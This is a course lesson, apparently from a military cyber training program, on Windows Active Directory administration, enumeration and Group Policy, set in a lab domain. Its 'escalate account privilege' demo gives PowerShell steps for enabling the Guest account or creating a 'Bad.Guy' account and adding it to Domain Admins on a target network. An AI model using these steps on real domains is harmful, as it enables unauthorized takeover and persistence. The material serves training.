D6L8-Windows Active Directory Terminal Learning Objectives: Demonstrate the use of command-line tools to query and modify the Directory Services database Describe the features and benefits of domains Describe the process and order of policy application in Active Directory, to include inheritance, conflicting policy behavior, and enforced policies Explain the roles and functions of resources associated with Active Directory (e.g., user groups, computers, domain controllers) Perform Active Directory queries/modifications and interpret query outputs (e.g., users, groups, computers, organizational units, memberships) Describe how Group Policy Objects (GPOs) are used to harden an OS and the implications to the system if it is not hardened Perform Group Policy Object (GPO) queries and modifications Explain how Group Policy Settings can impact operations Table of Contents 1. Active Directory 1.1 Active Directory Structure 1.2 Active Directory Features 2. Command Line Tools 2.1 Domain Service (DS) Tools 2.2 PowerShell 3. Domains 4. Active Directory Functions and Roles 4.1 Functions 4.2 Roles 4.3 Containers and Orgainizational Units (OU) 5. Active Directory Enumeration 5.1 Enumerate Active Directory 5.2 Enumerate Users 6. Demo Escalate Account Privilege to Own Network 6.1 Initial Recon 6.2 Enumerate users 6.3 Enumerate Users from a DCO perspective 7. Administrator Best Practices 7.1 AD Group Nesting Flaws 8. Policy Application in Active Directory 9. Group Policy Objects (GPOs) 10. Group Policy Object Demo 10.1 GUI Tool: Group Policy Management Tool 10.2 Display Resultant Set of Policy(RSoP) Information 10.3 DEMO: Whitelisting Applications 11. Impact of Group Policy Settings Additional References RSAT Download https://www.microsoft.com/en-us/download/details.aspx?id=45520 Introduction Having a central location to be able manage all of the assets/objects in a network can be very resourceful. Active Directory allows administrators to manage permissions and access to network resources which makes keeping your network safe and secure. 1. Active Directory TLOs: 2 Active Directory (AD) is a Microsoft technology used to manage computers and other devices on a network. Active Directory allows network administrators to create and manage domains, users, and objects within a network. For example, an administrator can create a group of users and give them specific access privileges to certain directories on the server. As a network grows, Active Directory provides a way to organize a large number of users into logical groups and subgroups, while providing access control at each level. 1.1 Active Directory Structure The Active Directory structure includes three main tiers: domains, trees, and forests. Each level of AD has specific access rights that Domain Controllers manage. 1.) Domains Active Directory objects (users or devices) that all use the same database or ar typically in the same location. 2.) Trees Several Domains grouped together. Typically, has a primary (root) domain controller for the entire tree. Within the tree there may be multiple domains connected by two-wat transitive trusts. 3.) Forests Forests, the highest level of the hierarchy, are groups of trees connected together via trust relationships. Figure 1. Relationship between Domains, Trees, and Forests in AD 1.2 Active Directory Features Centralize Data Storage Management and storage of data in a distributed repository spread accross multiple servers allows for easy access from any location on the network. Scalability Users can scale the Active Directory database to meet the specific needs of an organizatio and it’s network requirements. Extensibility Provides the ability to customize the information stored within the Active Directory database to include adding additional attributes, as needed, to describe the objects stored in the database. Manageability Management and administration can be performed from a single centralized location or any computer on the network, if necessary. Authentication Active Directory supports single sign-on authentication for multiple applications in the same session. 2. Command Line Tools TLOs: 1, 2 2.1 Domain Service (DS) Tools The Domain Service (DS) Tool Suite is a collection of AD command-line tools built into the Windows Server OS for administering common AD tasks. The DS tools suite is installed automatically when a server is promoted to an AD domain controller. For member servers, the tools are installed as a feature under Remote Server Administration Tools (RSAT). Any domain user can perform dsquery and dsget operations. To use other DS tools, run the tool’s command from an elevated command prompt. DSADD - Adds specific types of objects to the directory DSGET - Displays the selected properties of a specific object in a directory DSMOD - Modifies existing objects in the directory DSMOVE - Moves the existing objects in the directory DSQUERY - Allows you to query the directory according to specific criteria 1. Query User Information C:\Users\andy.dwyer>dsquery user -name andy.dwyer "CN=andy.dwyer,CN=Users,DC=army,DC=warriors 2. Add User C:\Users\andy.dwyer>dsadd user "cn=test.user,cn=users,dc=army,dc=warriors" -samid test.user dsadd succeeded:cn=testuser,cn=users,dc=army,dc=warriors The SAMID (an attribute) is the Security Account Manager name for user accounts and security descriptors. The Security Account Manager stores user passwords. If a user account and password are entered that match a pair in the database, the user is logged into the system. 3. Modify User Attribute C:\Users\andy.dwyer>dsmod user "cn=test.user,cn=users,dc=army,dc=warriors" -desc "Super Duper User" dsmod succeeded:cn=test.user,cn=users,dc=army,dc=warriors 4. Remove User C:\Users\andy.dwyer>dsrm "cn=test.user,cn=users,dc=army,dc=warriors" Are you sure you wish to delete cn=test.user,cn=users,dc=army,dc=warriors (Y/N)? Y dsrm succeeded:cn=test.user,cn=users,dc=army,dc=warriors https://www.youtube.com/watch?v=4UEpLORgcrM 2.2 PowerShell The PowerShell Active Directory module contains a group of command-lets used to manage and query objects in the Active Directory. It is a part of the Remote Server Administration Tools (RSAT). The RSAT module will need to be installed if you are not working on the Domain Controller directly. Some of the cmdlets available are: Table 1. Frequently Used PowerShell Active Directory Cmnlets Cmdlets What it’s Used for Get-ADDomain Domain info Get-ADDomainController DC info Get-ADDefaultDomainPasswordPolicy Domain password policy Get-ADComputer Domain computer Get-ADUser User info Get-ADGroup Group info Add-ADPrincipalGroupMembership Adding user to a group Enable-ADAccount Enabling a disabled account Search-ADAccount Locating accounts based on search criteria New-ADUser Adding a user Remove-ADObject Deleting a user/computer from the domain We will demonstrate the use of some of these cmdlets later during lecture. 3. Domains TLOs: 2, 4 A Domain is a fundamental unit of the Active Directory architecture. It is a logical group of objects that share common administration, security and replication settings. Using Active Directory domains, IT teams can define administrative boundaries and manage sets of devices, services and systems in a centralized manner. This allowas users, once logged in, access to network resources within the domain. An Organizational Unit (OU) is an object container that can include other objects like users, computers or groups from the same domain which can have Group Policy Objects applied to them. Objects are Active Directory structures that are formed by groupings of information, which are unique network entities such as a user or computer, and is described by a set of attributes. Object Classes are used to define the mandatory and optional attibutes that an object can have. For instance, the user Andy is an object stored in the Users class object, and the object Andy is described using the following object attributes: first name, last name, full name, department, and so on. Domains have a domain name system (DNS) structure. Multiple domains, when combined, form a group known as a tree. The tree structure uses a contiguous namespace to arrange domains in a logical hierarchy. Different domains in a tree share a secure connection and trust each other in a hierarchy. This means the first domain can implicitly trust the third domain in a hierarchy. A collection of multiple trees is called a forest. Admins can allocate specific access rights and communication privileges at all levels. Moreover, a forest also includes directory schemas, shared catalogs, domain configurations, and application information. The global catalog servers provide a list of all the objects in a forest, and the schema defines the class and attributes of an object in a forest. Organizational units (OUs) organize groups, users, and devices. Every domain can contain its own OU. The Domain Controller is the heart and brains of Active Directory. It’s main function is to authenticate and validate user access on the network. It is a server that contains a full copy of the Directory Services database and a complete copy of the schema for the domain. The domain controller keeps all of the data for the users and computers that work together on a network organized and secure. 4. Active Directory Functions and Roles TLOs: 4 4.1 Functions The primary responsibilty of the DC is to authenticate and validate user access on the network. When users log into their domain the DC checks their username, password and other credentials to either allow or deny access for that user. Some of the other key functions of the Domain Controller are: Stores and maintains a copy of the Directory Services database Replicates changes to the database to other domain controllers Provides redundancy if one of the domain controllers fails Provides a means for managing and administering the objects in the domain Performs identification and authentication, and manages the application of policy within the domain Additionally, the DC can be assigned specific roles called operations masters. 4.2 Roles The full Active Directory system is split into five seperate Flexible Single Master Operation (FSMO) Roles Schema Master: The Schema Master role manages the read-write copy of your Active Directory schema. Domain Naming Master: The Domain Naming Master makes sure that you don’t create a second domain in the same forest with the same name as another. It is the master of your domain names. RID Master: The Relative ID Master assigns blocks of Security Identifiers (SID) to different DCs they can use for newly created objects. Each object in AD has an SID, and the last few digits of the SID are the Relative portion. PDC Emulator: The DC with the Primary Domain Controller Emulator role is the authoritative DC in the domain. The PDC Emulator responds to authentication requests, changes passwords, and manages Group Policy Objects. Infrastructure Master: The Infrastructure Master role translates Globally Unique Identifiers (GUID), SIDs, and Distinguished Names (DN) between domains. Schema Masters and Domain Naming Masters are limited to one per forest, whereas the rest are limited to one per domain. 4.3 Containers and Orgainizational Units (OU) There are two methods used be Active Directory to manage large numbers of objects by it’s ability to group similar objects together. Using Containers is one method used to group a large numbers of similar objects together but not the more popular method used. OUs are just like containers but are the more utilized method due to the ability to apply Group Policy Objects to them. This allows for a single policy to be created and applied to the OU, which implements the policy to every object in the OU. 5. Active Directory Enumeration TLOs: 6 5.1 Enumerate Active Directory You can use PowerShell to enumerate the resources of Active Directory. The more you can learn about domains, users, groups, ACLs, GPOs, domain trusts, etc. the more you can increase your attack surface. This can increase your options and possibly allow you to take advantage of privilege esculation, lateral movements, persistence, etc. 1. Get a list of AD Commands Available PS> Get-Command -Module activedirectory CommandType Name Version Source ----------- ---- ------- ------ Cmdlet Add-ADCentralAccessPolicyMember 1.0.1.0 ActiveDirectory Cmdlet Add-ADComputerServiceAccount 1.0.1.0 ActiveDirectory Cmdlet Add-ADDomainControllerPasswordReplicationPolicy 1.0.1.0 ActiveDirectory Cmdlet Add-ADFineGrainedPasswordPolicySubject 1.0.1.0 ActiveDirectory __________CUT____________ 2. Get the Default Domain Password Policy AD supports one set of password and account lockout policies for a domain. Beginning in Windows Server 2008, you can override the default password and account lockout policies in a domain using Fine-Grained Password Policies (FGPP PS> Get-ADDefaultDomainPasswordPolicy ComplexityEnabled : True DistinguishedName : DC=army,DC=warriors LockoutDuration : 00:30:00 LockoutObservationWindow : 00:30:00 LockoutThreshold : 0 MaxPasswordAge : 42.00:00:00 __________CUT____________ 3. Check for any Fine-Grained Password Policies PS> Get-ADFineGrainedPasswordPolicy -Filter {name -like "*"} -No returns means it is not set- Fine-Grained Password Policies are a way to apply different password/account lockout policies to various users/groups within a domain. E.g. password complexity, lockout, history, maximum/minumum age, etc. 4. Get Forest details PS> Get-ADForest ApplicationPartitions : {DC=DomainDnsZones,DC=army,DC=warriors, DC=ForestDnsZones,DC=army,DC=warriors} CrossForestReferences : {} DomainNamingMaster : domain-controll.army.warriors Domains : {army.warriors} __________CUT____________ 5. Get Domain details: PS> Get-ADDomain AllowedDNSSuffixes : {} ChildDomains : {} ComputersContainer : CN=Computers,DC=army,DC=warriors DeletedObjectsContainer : CN=Deleted Objects,DC=army,DC=warriors DistinguishedName : DC=army,DC=warriors __________CUT____________ 6. Get AD Groups Get-ADGroup -Filter * DistinguishedName : CN=System Admins,CN=Users,DC=army,DC=warriors GroupCategory : Security GroupScope : Global Name : System Admins __________CUT____________ 7. Get a groups details PS> Get-ADGroup -Identity 'IA Analysts Team'' DistinguishedName : CN=IA Analysts Team,CN=Users,DC=army,DC=warriors GroupCategory : Security GroupScope : Global Name : IA Analysts Team __________CUT____________ 8. Get a list of a groups members PS> Get-ADGroupMember -Identity 'IA Analysts Team' -Recursive -No return means there are no assigned members- 10. To see additional properties, not just the default set PS> Get-ADUser -Identity 'Nina.Webster' -Properties Description, Description : 3rd PLT Soldier DistinguishedName : CN=Nina.Webster,OU=3RD PLT,OU=CCO,OU=3RDBN,OU=WARRIORS,DC=army,DC=warriors Enabled : True GivenName : Nina Name : Nina.Webster ObjectClass : user ObjectGUID : b35ba844-5b40-4eb4-96fd-ffafef36269a Office : SamAccountName : Nina.Webster SID : S-1-5-21-1181003830-945744892-2632747169-1820 Surname : Webster UserPrincipalName : //--OUTPUT TRUNCATED---// 5.2 Enumerate Users When HUNTING on an AD infrastructure for potential malicious users you should look for accounts that seem suspicious._ Examples of suspicious accounts include: Administrator accounts that aren’t known to the network owners Accounts that have been active outside of normal work hours Accounts that are nested in multiple administrative groups Service accounts logging into workstations Accounts that have logged in directly to the Domain Controller that are not normally authorized to do so This information can be collected through PowerShell and Windows Event Logs on the Domain Controller. Windows Logs are the best way to identify security issues.* 1. Searching for Multiple Users/List of Users PS C:\Users\andy.dwyer> Get-ADUser -filter * DistinguishedName : CN=Administrator,CN=Users,DC=army,DC=warriors Enabled : True GivenName : Name : Administrator ObjectClass : user ObjectGUID : eb4e85e6-d1a2-433c-b7f2-7886cbbae155 SamAccountName : Administrator SID : S-1-5-21-2232233716-3032066225-3874548077-500 Surname : UserPrincipalName : DistinguishedName : CN=Guest,CN=Users,DC=army,DC=warriors Enabled : False GivenName : Name : Guest ObjectClass : user ObjectGUID : 6225b806-a51d-4cda-bb0a-ec849ace339b SamAccountName : Guest SID : S-1-5-21-2232233716-3032066225-3874548077-501 Surname : UserPrincipalName : //--OUTPUT TRUNCATED---// 2. Searching for a Single User PS C:\Users\andy.dwyer> get-aduser andy.dwyer DistinguishedName : CN=andy.dwyer,CN=Users,DC=army,DC=warriors Enabled : True GivenName : Name : andy.dwyer ObjectClass : user ObjectGUID : eedd2b2b-c6a6-4fbd-b52f-3007a382f694 SamAccountName : andy.dwyer SID : S-1-5-21-2232233716-3032066225-3874548077-1002 Surname : UserPrincipalName : 3. Searching for Multiple Users + Extended Properties Get-AdUser -Filter * -Properties * Get-ADUser andy.dwyer -Properties * 4. Filter is what you can use to apply your conditions in. PS C:\Users\andy.dwyer> Get-ADUser -Filter {Name -like '*odonnell'} DistinguishedName : CN=Autumn.Odonnell,OU=CMD GRP,OU=STAFF,OU=HQ,OU=WARRIORS,DC=army,DC=warriors Enabled : True GivenName : Autumn Name : Autumn.Odonnell ObjectClass : user ObjectGUID : 088cb212-0336-4b59-b052-5897c847c793 SamAccountName : Autumn.Odonnell SID : S-1-5-21-2232233716-3032066225-3874548077-1129 Surname : Odonnell UserPrincipalName : .5. Properties is what you can use to view the data. Filtering for Different Fields, by Default you will get 10 fields : For Example Description is a property but does not show in our output unless specified Get-ADUser -Filter {Description -like '*supply*'} (1) DistinguishedName : CN=Kaleigh.Roach,OU=SUPPLY,OU=ACO,OU=1STBN,OU=WARRIORS,DC=army,DC=warriors Enabled : True GivenName : Kaleigh Name : Kaleigh.Roach ObjectClass : user ObjectGUID : faa902d9-964e-4228-b445-5eaf4f6c0b82 SamAccountName : Kaleigh.Roach SID : S-1-5-21-2232233716-3032066225-3874548077-1215 Surname : Roach UserPrincipalName : PS C:\Users\andy.dwyer> Get-ADUser -Filter {Description -like '*supply*'} -Properties Description (2) Description : Supply NCO DistinguishedName : CN=Kaleigh.Roach,OU=SUPPLY,OU=ACO,OU=1STBN,OU=WARRIORS,DC=army,DC=warriors Enabled : True GivenName : Kaleigh Name : Kaleigh.Roach ObjectClass : user ObjectGUID : faa902d9-964e-4228-b445-5eaf4f6c0b82 SamAccountName : Kaleigh.Roach SID : S-1-5-21-2232233716-3032066225-3874548077-1215 Surname : Roach UserPrincipalName : (1) Returns the users that match but does not display the Description property (2) Adds the Description property to the output .6. Full output for Specific User PS C:\Users\andy.dwyer> Get-ADUser -Filter {Name -like '*odonnell'} -Properties * AccountExpirationDate : 11/6/2021 2:00:20 PM accountExpires : 132806808200696190 AccountLockoutTime : AccountNotDelegated : False AllowReversiblePasswordEncryption : False AuthenticationPolicy : {} AuthenticationPolicySilo : {} BadLogonCount : 0 badPasswordTime : 0 badPwdCount : 0 CannotChangePassword : False CanonicalName : army.warriors/WARRIORS/HQ/STAFF/CMD GRP/Autumn.Odonnell Certificates : {} City : CN : Autumn.Odonnell //--OUTPUT TRUNCATED--// 7. Output specific information using Select-Object to filter PS C:\Users\andy.dwyer> Get-ADUser -Filter {Description -like '*'} -Properties Description | Select-Object Name,SID,Description Name SID Description ---- --- ----------- Administrator S-1-5-21-2232233716-3032066225-3874548077-500 Built-in account for administering the computer/domain Guest S-1-5-21-2232233716-3032066225-3874548077-501 Built-in account for guest access to the computer/domain krbtgt S-1-5-21-2232233716-3032066225-3874548077-502 Key Distribution Center Service Account Eddie.Sanchez S-1-5-21-2232233716-3032066225-3874548077-1126 Bridage Commander Belen.Mullins S-1-5-21-2232233716-3032066225-3874548077-1127 Brigade Executive Officer //--Output Truncated--// 6. Demo Escalate Account Privilege to Own Network TLOs: 6 6.1 Initial Recon Scenarios 1 and 2 are OCO oriented Given: creds for the target box are known We have access a box and we are worried that that user will log on during our mission Here are a couple options 6.2 Enumerate users If while on a target box we are concerned a legitimate user will log on during our mission consider the following Scenario 1: Find a user already on the box Find Disabled users PS> get-aduser -filter {Enabled -eq "FALSE"} -properties name, enabled DistinguishedName : CN=Guest,CN=Users,DC=army,DC=warriors Enabled : False GivenName : Name : Guest ObjectClass : user __________CUT____________ Enable that user PS> Enable-ADAccount -Identity guest -Nothing returned if successful execution- The password must meet domain complexity requirements Change the password PS> Set-AdAccountPassword -Identity guest -NewPassword (ConvertTo-SecureString -AsPlaintext -String "PassWord12345!!" -Force) -Nothing returned if successful execution- Add the user to an Admin Group Add-ADGroupMember -Identity "Domain Admins" -Members guest -Nothing returned if successful execution- You now own the network! Scenario 2: Create a new user on the box Run the following command to get a sample of the Distinguished Name to match AD format Get Distinguished Name to match AD format PS> Get-ADuser -filter * | select distinguishedname, name CN=Amelie.Benjamin,OU=3RD PLT,OU=CCO,OU=3RDBN,OU=WARRIORS,DC=army,DC=warriors Amelie.Benjamin CN=Ramon.Gibbs,OU=3RD PLT,OU=CCO,OU=3RDBN,OU=WARRIORS,DC=army,DC=warriors Ramon.Gibbs CN=Willie.Liu,OU=3RD PLT,OU=CCO,OU=3RDBN,OU=WARRIORS,DC=army,DC=warriors Willie.Liu CN=Yair.Roth,OU=3RD PLT,OU=CCO,OU=3RDBN,OU=WARRIORS,DC=army,DC=warriors Yair.Roth CN=Elisha.Coleman,OU=3RD PLT,OU=CCO,OU=3RDBN,OU=WARRIORS,DC=army,DC=warriors Elisha.Coleman __________CUT____________ Create a new user New-ADUser -Name "Bad.Guy" -AccountPassword (ConvertTo-SecureString -AsPlaintext -String "PassWord12345!!" -Force) -path "OU=3RD PLT,OU=CCO,OU=3RDBN,OU=WARRIORS,DC=army,DC=warriors" -Nothing returned if successful execution- Enable the user Enable-ADAccount -Identity "Bad.Guy" -Nothing returned if successful execution- Add the user to an Admin Group Add-ADGroupMember -Identity "Domain Admins" -Members "Bad.Guy" -Nothing returned if successful execution- You now own the network! When we are done, IF we aren’t maintaining persistence, we need to delete the new account or remove it from its group and disable it. Remove User PS> Remove-ADUser -Identity "Bad.Guy" Confirm Are you sure you want to perform this action? Performing the operation "Remove" on target "CN=Bad.Guy,OU=3RD PLT,OU=CCO,OU=3RDBN,OU=WARRIORS,DC=army,DC=warriors". [Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "Y"): Y Remove From Group PS> Remove-ADGroupMember -Identity "Domain Admins" -Members guest Confirm Are you sure you want to perform this action? Performing the operation "Remove" on target "CN=Bad.Guy,OU=3RD PLT,OU=CCO,OU=3RDBN,OU=WARRIORS,DC=army,DC=warriors". [Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "Y"): Y Disable Guest account PS> Disable-AdAccount -Identity Guest -Nothing returned if successful execution- 6.3 Enumerate Users from a DCO perspective Scenario: You are an admin and need to periodically check what accounts have 'Enterprise' and 'Domain' level access Get All Domain Admin Accounts PS> Get-AdGroupMember -identity "Domain Admins" -Recursive | %{Get-ADUser -identity $_.DistinguishedName} PS> Get-AdGroupMember -identity "Domain Admins" -Recursive | %{Get-ADUser -identity $_.DistinguishedName} | select name, Enabled name Enabled ---- ------- Administrator True andy.dwyer True Giada.Barrett True Garrett.Lowery True Trevon.Wolfe True Angelo.Berry True __________CUT____________ Get ALL Enterprise Admin accounts Get-AdGroupMember -identity "Enterprise Admins" -Recursive | %{Get-ADUser -identity $_.DistinguishedName} | select name, Enabled name Enabled ---- ------- Administrator True __________CUT____________ 7. Administrator Best Practices TLOs: 4 Q&A Question 1 What are some AD Administrator best practices? Answer 1 Administrator groups should be segregated by least privilege. Nesting of administrative groups should be avoided to ensure no privileges are falsely allocated. Question 2 What security flaw does this create? Answer 2 Group hierarchy should be taken into account when distributing privileges across a network or domain. Different level of privileges should be created and distributed to personnel requiring only that level of privilege. Multiple site organizations should not have administrative accounts with privileges to multiple sites. Segregation of sites should created to ensure proper security of the domain. 7.1 AD Group Nesting Flaws The Name Property will show the names of each member of the group 1. Get Name Property from the Active Directory Group named "Domain Admins" PS> (Get-AdGroupMember -Identity 'domain admins').Name Administrator System Admins LV1 PS> Get-AdGroupMember -Identity 'domain admins' | select name name -------- Administrator System Admins LV1 2. Get Active Directory Group 'System' Admin Names 'LvL 1' PS> (Get-AdGroupMember -Identity "System Admins LV1").Name System Admins 3. Get Active Directory Group 'System Admin' Names PS> (Get-AdGroupMember -Identity "System Admins").Name andy.dwyer System Admins Print Server Group System Admins LV2 Giada.Barrett Garrett.Lowery Trevon.Wolfe Angelo.Berry 4. Get Active Directory Group 'System' Admin Names 'LVL 2' PS> (Get-AdGroupMember -Identity "System Admins LV2").Name Silas.Salas Shania.Reilly Santino.Glass Xavier.Ibarra London.Cantrell Raegan.Lee 8. Policy Application in Active Directory TLOs: 3 Group Policy is a feature of Windows that facilitates a wide variety of advanced settings that network administrators can use to control the working environment of users and computer accounts in Active Directory. It essentially provides a centralized place for administrators to manage and configure operating systems, applications and users’ settings. Most objects in Active Directory will have multiple Group Policy Objects (GPOs) applied to them, especially if they are in nested groups. It is important to know what policies are going to be applied, in what order they will be applied, and if there are any conflicts. If there are two policies with opposing settings, (such as opening and closing the same port on the firewall), the one that is closest to the object (and hence applied last) will generally take effect. There are a few exceptions to this, primarily when inheritance is disabled on an OU or if an OU’s policies are set to ‘enforcing’. Disabling inheritance prevents any GPOs linked to the parent OU from being applied to the child OU. Setting the GPOs for an OU to enforcing tells Active Directory to not allow the GPO settings to be overridden by any subsequent policies that are applied. Again, in the absence of these conditions, the last policy applied will take effect. Policies are applied in the following order: 1. Local policy 2. Site policies 3. Domain policies 4. OU linked policies 5. Sub-OU linked policies Since Group Policy can be inheritated it is possible to create multiple group policies with conflicting settings. The highest parent container possible is the site. This is followed by the domain, and then each OU inside of the domain. Each of these OUs can have sub-OUs, an OU inside of an OU. All of these objects have a parent and child relationship. The parent is the place where the object was created, and can be a site, domain, OU, or sub-OU. The child is the object that was created inside of the parent and can be a domain, OU, or sub-OU. Group Policy settings are applied as follows: If the parent container has a setting configured, and the child container is not configured, the parent container group policy setting applies. If the parent container and child container both have a setting configured, and they are compatible, both parent and child container group policy settings apply. If the parent container and the child container both have a setting configured, but they are not compatible, the child container setting applies. 9. Group Policy Objects (GPOs) TLOs: 7 Group Policy is a Windows feature that contains a variety of advanced settings that allows network administrators to implement specific configurations of users and computers. Group Policy allows you to centralize the management of computers on your network without having to physically go to and configure each computer individually. Security settings can be applied to all objects within a domain using Group Policy, or configuration settings. Network administrators can configure Windows settings in a Group Policy, on the Domain Controller, by establishing Group Policy Objects (GPOs). These settings can then be implemented to define the environment of the network and enforced, users do not get the option to except or change these settings. The Active Directory service containers that GPOs are linked to are sites, domains and OUs. Group Policy can be configured and applied to every user and computer in the domain using the centralized management features of AD. This can be useful for locking down computers, restricting access to specific folders, control panel applets, and applications. It can also be used to change a variety of Windows settings, including ones that can’t be changed from the control panel or require registry tweaks to change. 10. Group Policy Object Demo TLOs: 8 10.1 GUI Tool: Group Policy Management Tool 1. Start Menu Start → Administrative Tool → Group Policy Management ↳ User Configuration → Administrative Template → System 2. Command Line C:\windows\system32> .\gpedit.msc 10.2 Display Resultant Set of Policy(RSoP) Information Run gpresult from the Domain Controller. RsoP (Resultant Set of Policy) is a Microsoft tool that is built into Windows 7 and later versions. It provides administrators a report on what group policy settings are getting applied to users and computers. Show GUI Rsop.msc Computer Configuration → Windows Settings → Security Settings → Account Policies → Password Policy This specifically shows the password policy for the system Gpresult options C:> gpresult /? GPRESULT [/S system [/U username [/P [password]]]] [/SCOPE scope] [/USER targetusername] [/R | /V | /Z] [(/X | /H) <filename> [/F]] Description: This command line tool displays the Resultant Set of Policy (RSoP) information for a target user and computer. //--Output Truncated--// Gpresult for a Specific User andy.dwyer Account C:\windows\system32>gpresult /user andy.dwyer /v Microsoft (R) Windows (R) Operating System Group Policy Result tool v2.0 © 2018 Microsoft Corporation. All rights reserved. Created on 9/22/2021 at 6:21:10 PM RSOP data for ARMY\andy.dwyer on DOMAIN-CONTROLL : Logging Mode ---------------------------------------------------------------- OS Configuration: Primary Domain Controller OS Version: 10.0.17763 Site Name: Default-First-Site-Name Roaming Profile: N/A Local Profile: C:\Users\andy.dwyer Connected over a slow link?: No //--Output Truncated--// Administrator Account C:> gpresult /user Administrator /v RSOP data for ARMY\Administrator on DOMAIN-CONTROLL : Logging Mode OS Configuration: Primary Domain Controller OS Version: 10.0.17763 Site Name: Default-First-Site-Name Roaming Profile: N/A Local Profile: C:\Users\Administrator //--Output Truncated--// Displays data about the machine and logged on user C:> gpresult /r COMPUTER SETTINGS CN=DOMAIN-CONTROLL,OU=Domain Controllers,DC=army,DC=warriors Last time Group Policy was applied: 2/25/2021 at 6:21:44 PM Group Policy was applied from: domain-controll.army.warriors Group Policy slow link threshold: 500 kbps Domain Name: ARMY Domain Type: Windows 2008 or later //--Output Truncated--// Force any group policy setting to take affect immediately versus rebooting the computer C:> gpupdate /force Updating policy... Computer Policy update has completed successfully. User Policy update has completed successfully. Microsoft Article on using GPresult THe SysAdmin.co.uk Blog: Group Policy – GPResult Examples 10.3 DEMO: Whitelisting Applications TELL STUDENTS NOT TO FOLLOW ALONG IN THEIR BOX We are going to demostrate whitelisting an application through the Local Group Policy Editor. We will show that the autoruns program will start normally. We will then enable the Run only specified Windows applications and add the Autoruns application. We will then show that only autoruns will open. Do not Close the Editor! 1. run gpedit.msc → User → Admin → System ↳ Then open ↳ 'Run only specified Windows applications' ↳ Click 'Enabled' → 'Show' ↳ Add 'autoruns.exe' Run autoruns.exe from Windows explorer Attempt to run autoruns64.exe from Windows explorer 2. Ensure you change the Run only specified Windows applications setting back to Not Configured and Apply 11. Impact of Group Policy Settings TLOs: 9 Administrators use GPOs for numerous reasons. From a security stand point, scripts can be run through Group Policy to stop users from accessing certain resources and perform simple tasks, such as forcing a particular home page to open for every network user. Limit access to the Control Panel - Access to the control panel, which controls all aspects of a computer, can be limited to keep data and other resources safe. Disable the Command Prompt - Access to the command prompt allows users to run commands that can give high level access and bypass other system restrictions. Block Software Installation - If allowed, a user may install unwanted applications or malware that could compromise a system. In addition to the security benifits, there are other reasons for implimenting GPOs. Ease of Administration - Administrators can deploy software, patches and other updates Enforcement of Password Policy - Use GPOs to establish password length, the reuse rules and other password requirements More Efficient Management - Having GPOs already in place when new users and computers join the network apply a standardized environment which saves time during setup. Q&A Question 1 What are AD Administrator best practices? Answer 1 Administrator groups should be segregated by least privilege. Nesting of administrative groups should be avoided to ensure no privileges are falsely allocated. Question 2 What security flaw does this create? Answer 2 Group hierarchy should be taken into account when distributing privileges across a network or domain. Different level of privileges should be created and distributed to personnel requiring only that level of privilege. Multiple site organizations should not have administrative accounts with privileges to multiple sites. Segregation of sites should created to ensure proper security of the domain. Question 3 Is it a good idea to have all admin users with full domain admin privileges? Answer 3 No Question 4 Should users be allowed to log onto machines with administrative credentials? Answer 4 No. Many administrators tend to log onto machines with their administrative account rather than a regular user account and then escalating privileges. This can cause many issues. The main being that if an attacker was on the box he/she would be able to potentially hijack your session. Question 5 Should the default local administrator account be left enabled? Answer 5 No. The default local administrator account on all hosts should be disabled. If an attacker were to compromise just 1 system with knowledge of the default admin, then the rest of the domain would be easily owned. Summary Today we talked about the structure of Active Directory and how to manage assets in tiers and groups. We talked about how administrators can use naming conventions and how being familiar with their network can help identify something that isn’t right. We also used both the gui and PowerShell and command line tools to enuremate user profiles. Additional References [1] Security System Components, Safari Books Online